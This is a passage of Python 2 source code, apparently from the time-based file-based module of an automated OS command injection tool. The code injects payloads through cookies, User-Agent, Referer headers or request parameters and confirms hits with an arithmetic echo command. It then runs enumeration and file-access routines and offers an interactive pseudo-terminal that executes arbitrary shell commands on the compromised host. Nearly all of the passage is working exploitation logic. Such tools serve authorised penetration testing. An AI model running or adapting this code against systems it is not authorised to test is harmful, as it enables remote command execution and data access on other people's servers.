              payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)

            # Fix prefixes / suffixes
            payload = parameters.prefixes(payload, prefix)
            payload = parameters.suffixes(payload, suffix)
              
            # Check if defined "--verbose" option.
            if menu.options.verbose:
              sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)
                
            # Cookie Injection
            if settings.COOKIE_INJECTION == True:
              # Check if target host is vulnerable to cookie injection.
              vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
              how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
              
            # User-Agent Injection
            elif settings.USER_AGENT_INJECTION == True:
              # Check if target host is vulnerable to user-agent injection.
              vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
              how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload)

            # Referer Injection
            elif settings.REFERER_INJECTION == True:
              # Check if target host is vulnerable to referer injection.
              vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
              how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload)

            else:
              # Check if target host is vulnerable.
              how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)

            # Injection percentage calculation
            percent = ((num_of_chars * 100) / total)

            if percent == 100 and no_result == True:
              if not menu.options.verbose:
                percent = Fore.RED + "FAILED" + Style.RESET_ALL
              else:
                percent = ""
            else:
              if (url_time_response <= 1 and how_long >= delay) or \
              (url_time_response >= 2 and how_long > delay):

                # Time relative false positive fixation.
                randv1 = random.randrange(0, 1)
                randv2 = random.randrange(1, 2)
                randvcalc = randv1 + randv2

                cmd = "echo $((" + str(randv1) + "+" + str(randv2) + "))"
                output  = tfb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell)
                if str(output) == str(randvcalc):
                  if not menu.options.verbose:
                    percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                  else:
                    percent = ""
                else:
                  break
                    
              else:
                percent = str(percent)+"%"
                
            if not menu.options.verbose:
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
              
          except KeyboardInterrupt: 
            raise
          
          except:
            percent = ((num_of_chars * 100) / total)
            if percent == 100:
              if no_result == True:
                if not menu.options.verbose:
                  percent = Fore.RED + "FAILED" + Style.RESET_ALL
                  sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
                  sys.stdout.flush()
                else:
                  percent = ""
                break
              else:
                percent = str(percent)+"%"
              #Print logs notification message
              percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
              print ""
              logs.logs_notification(filename)
              raise
            else:
              percent = str(percent)+"%"
            break
          
          # Yaw, got shellz! 
          # Do some magic tricks!
          if (url_time_response <= 1 and how_long >= delay) or \
          (url_time_response >= 2 and how_long > delay) :

            if len(TAG) == output_length:
              found = True
              no_result = False
              
              if settings.COOKIE_INJECTION == True: 
                header_name = " Cookie"
                found_vuln_parameter = vuln_parameter
                the_type = " HTTP header"

              elif settings.USER_AGENT_INJECTION == True: 
                header_name = " User-Agent"
                found_vuln_parameter = ""
                the_type = " HTTP header"

              elif settings.REFERER_INJECTION == True: 
                header_name = " Referer"
                found_vuln_parameter = ""
                the_type = " HTTP header"

              else:
                header_name = ""
                the_type = " parameter"
                if http_request_method == "GET":
                  found_vuln_parameter = parameters.vuln_GET_param(url)
                else :
                  found_vuln_parameter = vuln_parameter

              if len(found_vuln_parameter) != 0 :
                found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL  + Style.BRIGHT + "'" 

              # Print the findings to log file.
              if export_injection_info == False:
                export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
              if vp_flag == True:
                vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
              logs.upload_payload(filename, counter, payload) 
              counter = counter + 1
              
              # Print the findings to terminal.
              print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL
              print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
              print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
              print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL
              
              # Check for any enumeration options.
              tfb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)

              # Check for any enumeration options.
              tfb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
              
              # Check if defined single cmd.
              if menu.options.os_cmd:
                tfb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)

              # Pseudo-Terminal shell
              go_back = False
              while True:
                if go_back == True:
                  break
                gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
                if gotshell in settings.CHOISE_YES:
                  print ""
                  print "Pseudo-Terminal (type '?' for shell options)"
                  while True:
                    try:
                      cmd = raw_input("Shell > ")
                      if cmd.lower() in settings.SHELL_OPTIONS:
                        if cmd == "?":
                          menu.shell_options()
                          continue
                        elif cmd.lower() == "quit":
                          logs.logs_notification(filename)
                          sys.exit(0)
                        elif cmd.lower() == "back":
                          go_back = True
                          break
                        else:
                          pass
                        
                      else:
                        # The main command injection exploitation.
                        check_how_long, output  = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)

                        if menu.options.verbose:
                          print ""
                          
                        if output != "" and check_how_long != 0 :
                          print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
                          print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
                        else:
                          print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"
                        
                    except KeyboardInterrupt: 
                      raise
                      
                elif gotshell in settings.CHOISE_NO:
                  if menu.options.verbose:
                    sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
                    sys.stdout.flush()
                  break
                
                else:
                  if gotshell == "":
                    gotshell = "enter"
                  print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                  pass
                  
            break
    
  if no_result == True:
    print ""
    return False

  else :
    sys.stdout.write("\r")
    sys.stdout.flush()